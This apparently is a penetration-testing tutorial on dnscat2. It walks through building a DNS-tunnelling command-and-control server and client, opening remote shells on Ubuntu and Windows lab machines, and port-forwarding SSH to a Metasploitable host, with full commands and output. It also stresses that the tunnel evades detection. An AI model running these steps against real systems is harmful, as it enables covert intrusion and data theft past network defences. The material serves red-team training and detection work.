DNScat2: Application Layer C&C



hackingarticles.in/dnscat2-application-layer-cc

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In today's world, IT infrastructure and network security devices are becoming more and more secure and hence, ports like 53 (DNS) is used as a communication channel between a client and a C2 server. In highly restricted environments, DNS always resolves domains. So, to serve our penetration testing purpose we might require a tool that can create reverse connections on port 53 and perform DNS tunnelling when necessary. In comes, dnscat2.

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Introduction to DNS

The Domain Name System (DNS) associate's URLs with their IP address. With DNS, it's conceivable to type words rather than a series of numbers into a browser, enabling individuals to look for sites and send messages utilizing commonplace names. When you look for the domain name in a browser, it sends a question over to the DNS server to coordinate the domain with its IP. When found, it utilizes the IP to recover the site's content. Most astonishingly, this entire procedure takes just milliseconds. For all this working, it uses port 53.

Introduction to DNScat

DNScat is such praised tool because it can create a command and control tunnel over the DNS protocol which lets an attacker work in stealth mode. You can access any data along with uploading and downloading files and to get a shell. For this tool to work over 53 port, you don't need to have authoritative access to DNS server, you can just simply establish your connection over port 53 and it will be faster and it will still be sensed as usual traffic. But it makes its presence well known in the packet log.

DNScat is made of two components i.e. a server and a client. To know the working of dnscat, it is important to understand both of these components.

The client is intended to be kept running on a target machine. It's written in C and has the least amount of the prerequisites. When you run the client, you regularly indicate a domain name. All packets will be sent to the local DNS server, which is then directed to the legitimate DNS server for that domain (which you, apparently, have control of).

The server is intended to be kept running on a definitive DNS server. It's developed in ruby and relies upon a few distinct gems. When you run it, much like the client, you indicate from which domain(s) it listens to over 53. When it gets traffic for one of those domains, it endeavours to set up a legitimate association. It gets other traffic it will automatically disregard it but, however, it can also advance it upstream.

Installation

Run the following git command to download dnscat2:

git clone https://github.com/iagox86/dnscat2.git

```
rootakali:~# git clone https://github.com/iagox86/dnscat2.git Cloning into 'dnscat2'...
remote: Enumerating objects: 6607, done.
Receiving objects: 100% (6607/6607), 3.82 MiB | 244.00 KiB/s, done.
remote: Total 6607 (delta 0), reused 0 (delta 0), pack-reused 6607
Resolving deltas: 100% (4564/4564), done.
rootakali:~#
```

Now install bundler as it is a major dependency for dnscat2. To install bundler go into the server of dnscat2 and type:

gem install bundler
bundle install

```
ali:~# cd dnscat2/
        i:~/dnscat2# cd server/_
root@kali:~/dnscat2/server# gem install bundler
Successfully installed bundler-2.1.4
Parsing documentation for bundler-2.1.4
Done installing documentation for bundler after 2 seconds
1 gem installed
      ali:~/dnscat2/server# bundle install-
Don't run Bundler as root. Bundler can ask for sudo if it is needed,
Using bundler 2.1.4
Using ecdsa 1.2.0
Using salsa20 0.1.1
Using sha3 1.0.1
Using trollop 2.1.2
Bundle complete! 4 Gemfile dependencies, 5 gems now installed.
Use `bundle info [gemname]` to see where a bundled gem is installed.
    kali:~/dnscat2/server#
```

Once everything is done, the server will run with the following command:

```
ali:~/dnscat2/server# ruby dnscat2.rb _
New window created: 0
New window created: crypto-debug
Welcome to dnscat2! Some documentation may be out of date.
auto attach ⇒ false
history_size (for new windows) ⇒ 1000
Security policy changed: All connections must be encrypted
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = n/a]...
It looks like you didn't give me any domains to recognize!
That's cool, though, you can still use direct queries,
although those are less stealthy.
To talk directly to the server without a domain name, run:
  ./dnscat --dns server=x.x.x.x,port=53 --secret=97a0daee02c249a08d7646c040fc2218
Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.
dnscat2>
```

Similarly, download dnscat2 in the client machine too. And use make command to compile it with the server, as shown in the image below:

```
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/
cd client/
make
```

To establish a connection between client and server, use the following command:

```
./dnscat --dns=server=192.168.0.102,port=53
```

You can check the successful creation of the session in Wireshark too. In real life scenario, port 53 plays a huge role in getting reverse shell because port 53 is seldom blocked in security devices and plus in scenarios where a system hosts more than one NIC cards, traffic of both the cards travels through a single DNS.

ip.addr == 192.168.0.196 dns							
N	о.	Time	Source	Destination	Protoc	ol Lengti	
7	- 8	42 3.948486238	192.168.0.196	192.168.0.102	DNS	21!	
4	- 8	74 4.068390917	192.168.0.102	192.168.0.196	DNS	384	
	11	23 4.982986147	192.168.0.196	192.168.0.102	DNS	130	
	11	25 4.984024071	192.168.0.102	92.168.0.196	DNS	183	
	11	26 4.984416101	192.168.0.196	192.168.0.102	DNS	10:	
	11	27 4.984783490	192.168.0.102	192.168.0.196	DNS	148	
	12	46 6.001049588	192.168.0.196	192.168.0.102	DNS	10:	
	12	47 6.001779008	192.168.0.102	192.168.0.196	DNS	148	
	16	35 7.018476398	192.168.0.196	192.168.0.102	DNS	10:	
	16	36 7.019200850	192.168.0.102	192.168.0.196	DNS	158	
	18	72 8.034192899	192.168.0.196	192.168.0.102	DNS	10:	

Once the connection is established, you can see on the server-side that you will have a session as shown in the image below. You can use the command 'sessions' to check for a session that is created. Now, here we can play around with many options all of which are available under the 'help' category.

session help

Now, to interact with the said session type the following command:

session -i 1

```
dnscat2> New window created: 1 -
Session 1 security: ENCRYPTED BUT *NOT* VALIDATED
For added security, please ensure the client displays the same string:
>> Roving Spear Hound Parrot Absorb Hobbit
dnscat2> help ____
Here is a list of commands (use -h on any of them for additional help):
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows
dnscat2> session 🚤
0 :: main [active]
  crypto-debug :: Debug window for crypto stuff [*]
 dns1 :: DNS Driver running on 0.0.0.0:53 domains =
1 :: command (ubuntu) [encrypted, NOT verified] [*]
dnscat2> session -i 1
New window created: 1
history_size (session) ⇒ 1000
Session 1 security: ENCRYPTED BUT *NOT* VALIDATED
For added security, please ensure the client displays the same string:
>> Roving Spear Hound Parrot Absorb Hobbit
This is a command session!
That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.
command (ubuntu) 1>
```

We can access the session now and interact with many of the options available. Let's try interacting with the Ubuntu system using the command:

shell

Sure enough, this will create a new session 2 and upon interacting with the said session we'll have a traditional shell.

```
sessions -i 2
uname -a
ifconfig
```

```
command (ubuntu) 1> shell
Sent request to execute a shell
command (ubuntu) 1> New window created: 2
Shell session created!
command (ubuntu) 1> session -i 2-
New window created: 2
history_size (session) ⇒ 1000
Session 2 security: ENCRYPTED BUT *NOT* VALIDATED
For added security, please ensure the client displays the same string:
>> Tried Story Deadly Static Deepen Strode
This is a console session!
That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!
To go back, type ctrl-z.
sh (ubuntu) 2> uname -a ...
sh (ubuntu) 2> Linux ubuntu 5.4.0-40-generic #44-Ubuntu SMP Tue Jun 23 00:01:04
sh (ubuntu) 2> ifconfig
sh (ubuntu) 2> ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
        inet 192.168.0.196 netmask 255.255.255.0 broadcast 192.168.0.255
        inet6 fe80::c418:3516:30f3:cf62 prefixlen 64 scopeid 0×20<link>
       ether 00:0c:29:c8:9c:50 txqueuelen 1000 (Ethernet)
       RX packets 105097 bytes 144870638 (144.8 MB)
       RX errors 0 dropped 0 overruns 0 frame 0
       TX packets 58267 bytes 4378503 (4.3 MB)
       TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ens38: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
       inet 192.168.205.130 | netmask 255.255.25 | broadcast 192.168.205.255
       inet6 fe80::44a6:8a8:230e:ec96 prefixlen 64 scopeid 0×20<link>
       ether 00:0c:29:c8:9c:5a txqueuelen 1000 (Ethernet)
       RX packets 59 bytes 9242 (9.2 KB)
       RX errors 0 dropped 0 overruns 0 frame 0
       TX packets 88 bytes 11530 (11.5 KB)
       TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
        inet 127.0.0.1 netmask 255.0.0.0
        inet6 :: 1 prefixlen 128 scopeid 0×10<host>
       loop txqueuelen 1000 (Local Loopback)
       RX packets 369 bytes 32192 (32.1 KB)
       RX errors 0 dropped 0 overruns 0 frame 0
       TX packets 369 bytes 32192 (32.1 KB)
       TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
```

DNS Tunnelling

The important thing to note here is that the client system clearly has two NIC cards installed and the IP ranges are different in both. So, traditionally, a system present in first IP range 192.168.0.0/24 won't be able to communicate with a system present in the second IP range 192.168.205.0/24

Here, we perform reconnaissance and found one more system on the range 192.168.205.0/24 with IP address 192.168.205.131 and forward this system's port 22 to the client's port 8888 to create a DNS tunnel between the two systems using the command shell we had obtained in previous steps.

```
command (ubuntu) 1> listen 127.0.0.1:8888 192.168.205.131:22 Listening on 127.0.0.1:8888, sending connections to 192.168.205.131:22
```

Now, using our server, we try to log into the system with IP address **192.168.205.131**. Here, we know the credentials of the system at IP 192.168.205.131 so we log indirectly.

```
ssh msfadmin@127.0.0.1 -p 8888
```

And as we can see, we are able to communicate with the system comfortably.

```
i:~# ssh msfadmin@127.0.0.1 -p 8888
msfadmin@127.0.0.1's password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Mon Jul 27 13:16:52 2020
msfadmin@metasploitable:~$ ifconfig
          Link encap:Ethernet HWaddr 00:0c:29:78:20:90
          inet addr 192.168.205.131 Bcast:192.168.205.255 Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe78:2090/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
          RX packets:197 errors:0 dropped:0 overruns:0 frame:0
          TX packets:149 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:32346 (31.5 KB) TX bytes:23350 (22.8 KB)
          Interrupt:16 Base address:0×2000
lo
          Link encap:Local Loopback
          inet addr:127.0.0.1 Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
          RX packets:262 errors:0 dropped:0 overruns:0 frame:0
          TX packets:262 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:102073 (99.6 KB) TX bytes:102073 (99.6 KB)
```

The same can be done easily for a window's client too. Follow the link **here** to download a suitable dnscat2 client for your system of windows. The latest client of dnscat for windows is marked in the snapshot below for reference.

← → C û https://downlo	onds skullsosurity org/doscat?/	 >>
Thitps://downli	oads. skullsecurity.org /dnscat2/ 🚤	
dnscat2-v0.04-client-win32.zip.sig	05-Mar-2018 16:28	181
dnscat2-v0.04-client-x64.tar.bz2	05-Mar-2018 16:28	50590
dnscat2-v0.04-client-x64.tar.bz2.sig	05-Mar-2018 16:28	181
dnscat2-v0.04-client-x86.tar.bz2	05-Mar-2018 16:29	49878
dnscat2-v0.04-client-x86.tar.bz2.sig	05-Mar-2018 16:28	181
dnscat2-v0.04-server.tar.bz2	05-Mar-2018 16:29	33850
dnscat2-v0.04-server.tar.bz2.sig	05-Mar-2018 16:28	181
dnscat2-v0.04-server.zip	05-Mar-2018 16:28	51821
dnscat2-v0.04-server.zip.sig	05-Mar-2018 16:28	181
dnscat2-v0.05-client-source.tar.bz2	05-Mar-2018 16:29	119813
<pre>dnscat2-v0.05-client-source.tar.bz2.sig</pre>	05-Mar-2018 16:28	181
<pre>dnscat2-v0.05-client-source.zip</pre>	05-Mar-2018 16:28	183833
<pre>dnscat2-v0.05-client-source.zip.sig</pre>	05-Mar-2018 16:28	181
<pre>dnscat2-v0.05-client-win32.zip</pre>	07-Jun-2019 18:43	78590
<pre>dnscat2-v0.05-client-win32.zip.sig</pre>	05-Mar-2018 16:28	181
dnscat2-v0.05-client-x64.tar.bz2	05-Mar-2018 16:29	53211
<pre>dnscat2-v0.05-client-x64.tar.bz2.sig</pre>	05-Mar-2018 16:28	181
dnscat2-v0.05-client-x86.tar.bz2	05-Mar-2018 16:28	52709
<pre>dnscat2-v0.05-client-x86.tar.bz2.sig</pre>	05-Mar-2018 16:28	181
dnscat2-v0.05-server.tar.bz2	05-Mar-2018 16:29	36183
dnscat2-v0.05-server.tar.bz2.sig	05-Mar-2018 16:29	181
dnscat2-v0.05-server.zip	05-Mar-2018 16:28	56463
<pre>dnscat2-v0.05-server.zip.sig</pre>	05-Mar-2018 16:29	181
<pre>dnscat2-v0.07-client-source.tar.bz2</pre>	05-Mar-2018 16:28	119998
<pre>dnscat2-v0.07-client-source.tar.bz2.sig</pre>	05-Mar-2018 16:28	181
<pre>dnscat2-v0.07-client-source.zip</pre>	05-Mar-2018 16:28	183811
<pre>dnscat2-v0.07-client-source.zip.sig</pre>	05-Mar-2018 16:29	181
dnscat2-v0.0/-client-win32.zip	07-Jun-2019 18:44	78724
dnscat2-v0.07-client-win32.zip.sig	05-Mar-2018 16:28	181
dnscat2-v0.07-client-x64.tar.bz2	05-Mar-2018 16:29	53373
dnscat2-v0.07-client-x64.tar.bz2.sig	05-Mar-2018 16:29	181
dnscat2-v0.07-client-x86.tar.bz2	05-Mar-2018 16:29	52920
dnscat2-v0.07-client-x86.tar.bz2.sig	05-Mar-2018 16:28	181
dnscat2-v0.07-server.tar.bz2	05-Mar-2018 16:28	36534
dnscat2-v0.07-server.tar.bz2.sig	05-Mar-2018 16:28	181
dnscat2-v0.07-server.zip	05-Mar-2018 16:29	57011
<pre>dnscat2-v0.07-server.zip.sig</pre>	05-Mar-2018 16:29	181

We'll perform the same steps as we did initially on the Ubuntu client while running dnscat and run the following command:

```
dnscat2-v0.07-client-win32.exe --dns-server=192.168.0.102,port=53
```

And finally, we see session established status in the window. When we refresh our server's dnscat2 console, we see a new session is created. To interact with it we use the command:

```
C:\Users\raj\Downloads>dnscat2-v0.07-client-win32.exe --dns=server=192.168.0.102,port=53  
Creating DNS driver:
    domain = (null)
    host = 0.0.0.0
    port = 53
    type = TXT,CNAME,MX
    server = 192.168.0.102

Encrypted session established! For added security, please verify the server also displays this string:

Rapier Bogie Tins Impish Durian Harold

Session established!
```

session -i 1

Following it with the command:

shell

We would see a new session is now created as in the previous case of a Linux system. We interact with it using the following command:

sessions -i 2

And a brand new Windows shell gets opened!

```
dnscat2> session -i 1
New window created: 1
history_size (session) ⇒ 1000
Session 1 security: ENCRYPTED BUT *NOT* VALIDATED
For added security, please ensure the client displays the same string:
>> Rapier Bogie Tins Impish Durian Harold
This is a command session!
That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.
command (DESKTOP-A0AP00M) 1> shell
Sent request to execute a shell
command (DESKTOP-A0AP00M) 1> New window created: 2
Shell session created!
command (DESKTOP-A0AP00M) 1> session -i 2 📹
New window created: 2
history_size (session) ⇒ 1000
Session 2 security: ENCRYPTED BUT *NOT* VALIDATED
For added security, please ensure the client displays the same string:
>> Stilt Ripe Upseal Cargo Polite Mayo
This is a console session!
That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!
To go back, type ctrl-z.
Microsoft Windows [Version 10.0.18362.959]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\raj\Downloads>
cmd.exe (DESKTOP-A0AP00M) 2> systeminfo .
cmd.exe (DESKTOP-A0AP00M) 2> systeminfo
Host Name:
                           DESKTOP-A0AP00M
OS Name:
                           Microsoft Windows 10 Pro
OS Version:
                           10.0.18362 N/A Build 18362
OS Manufacturer:
                           Microsoft Corporation
OS Configuration:
                          Standalone Workstation
OS Build Type:
                           Multiprocessor Free
Registered Owner:
                           raj
Registered Organization:
Product ID:
                           00331-10000-00001-AA002
Original Install Date:
                           6/30/2020, 12:25:36 AM
                           7/18/2020, 8:33:42 PM
System Boot Time:
System Manufacturer:
                           Dell Inc.
System Model:
                           OptiPlex 7050
                           x64-based PC
System Type:
Processor(s):
                           1 Processor(s) Installed.
```

Conclusion

Even in the most confined situations, DNS traffic ought to be permitted to determine inner or outside network. This can be utilized as a correspondence channel between an objective host and the command and control server. Command and information are

contained inside DNS inquiries and identification that is why detection is troublesome since arbitrary command hides in plain sight due it being perceived as legitimate traffic. And this is exactly what DNSCat takes advantage of, making it a successful tool to attack.

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